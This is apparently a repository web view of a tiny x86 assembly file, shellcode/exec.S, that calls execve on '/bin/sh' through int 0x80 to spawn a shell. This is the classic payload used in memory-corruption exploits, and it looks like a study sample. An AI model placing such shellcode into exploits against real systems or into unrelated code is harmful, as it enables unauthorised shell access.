summaryrefslogtreecommitdiff
path: root/shellcode/exec.S
blob: 660057b2874f223a397b4d647d2a942d77ec0bd4 (plain)
1
2
3
4
5
6
7
8
.global _start
_start:
movl $11, %eax
leal _cmd, %ebx
int $0x80
_cmd:
.ascii "/bin/sh"
.byte 0